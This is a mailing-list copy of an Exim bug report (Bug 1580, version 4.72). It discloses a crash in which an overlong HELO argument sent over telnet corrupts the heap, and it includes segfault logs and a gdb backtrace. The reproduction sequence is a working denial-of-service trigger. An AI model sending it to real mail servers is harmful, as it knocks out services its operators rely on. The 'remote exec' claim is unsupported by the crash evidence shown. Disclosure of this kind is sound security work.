[exim-dev] [Bug 1580] New: 【remote exec vulnerability】

------- You are receiving this mail because: -------
You are on the CC list for the bug.

http://bugs.exim.org/show_bug.cgi?id=1580
           Summary: 【remote exec vulnerability】
           Product: Exim
           Version: 4.72
          Platform: Other
        OS/Version: Windows
            Status: NEW
          Severity: security
          Priority: critical
         Component: Eximon
        AssignedTo: nigel@???
        ReportedBy: luodalongde@???
                CC: exim-dev@???

Created an attachment (id=785)
--> (http://bugs.exim.org/attachment.cgi?id=785)
conf file

this is a remote code exec vulnerability.

crash report:
Jan 29 00:55:13 localhost kernel: exim[25432]: segfault at 18 ip
00007fcb67c254fd sp 00007fff66f272b0 error 4 in
libc-2.12.so[7fcb67bad000+18a000]
Jan 29 00:58:45 localhost kernel: exim[25471]: segfault at 18 ip
00007feae99034fd sp 00007ffff8aefaf0 error 4 in
libc-2.12.so[7feae988b000+18a000]


if client do these , server will crash::
[root@localhost ~]# telnet 192.168.77.98 25
Trying 192.168.77.98...
Connected to 192.168.77.98.
Escape character is '^]'.
220 localhost.localdomain ESMTP Exim 4.72 Thu, 29 Jan 2015 01:01:15 +0800
127.0.0.1
500 unrecognized command
helo
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Connection closed by foreign host.

debug info:
(gdb) bt
#0  0x00007f840a11a625 in raise (sig=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00007f840a11be05 in abort () at abort.c:92
#2  0x00007f840a158537 in __libc_message (do_abort=2, fmt=0x7f840a240900 "***
glibc detected *** %s: %s: 0x%s ***\n")
    at ../sysdeps/unix/sysv/linux/libc_fatal.c:198
#3  0x00007f840a15de66 in malloc_printerr (action=3, str=0x7f840a240c00
"free(): invalid next size (normal)", ptr=<value optimized out>) at
malloc.c:6336
#4  0x00007f840a1609b3 in _int_free (av=0x7f840a477e80, p=0x7f840de4d8b0,
have_lock=0) at malloc.c:4832
#5  0x00007f840a14e4cd in _IO_new_fclose (fp=0x7f840de4d8c0) at iofclose.c:88
#6  0x00007f840ca37e7d in os_find_running_interfaces_linux () at os.c:148
#7  0x00007f840ca2f01d in host_find_interfaces () at host.c:834
#8  0x00007f840ca2f27b in host_scan_for_local_hosts (host=<value optimized
out>, lastptr=0x7fff2d907110, removed=0x0) at host.c:1328
#9  0x00007f840ca2f821 in host_find_byname (host=0x7fff2d907160,
ignore_target_hosts=0x0, flags=<value optimized out>, fully_qualified_name=0x0, 
    local_host_check=1) at host.c:2109
#10 0x00007f840ca58120 in smtp_verify_helo () at smtp_in.c:2492
#11 0x00007f840ca5a8d4 in smtp_setup_msg () at smtp_in.c:2919
#12 0x00007f840ca05ade in handle_smtp_call () at daemon.c:506
#13 daemon_go () at daemon.c:1875
#14 0x00007f840ca192ac in main (argc=3, cargv=<value optimized out>) at
exim.c:4262

--
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email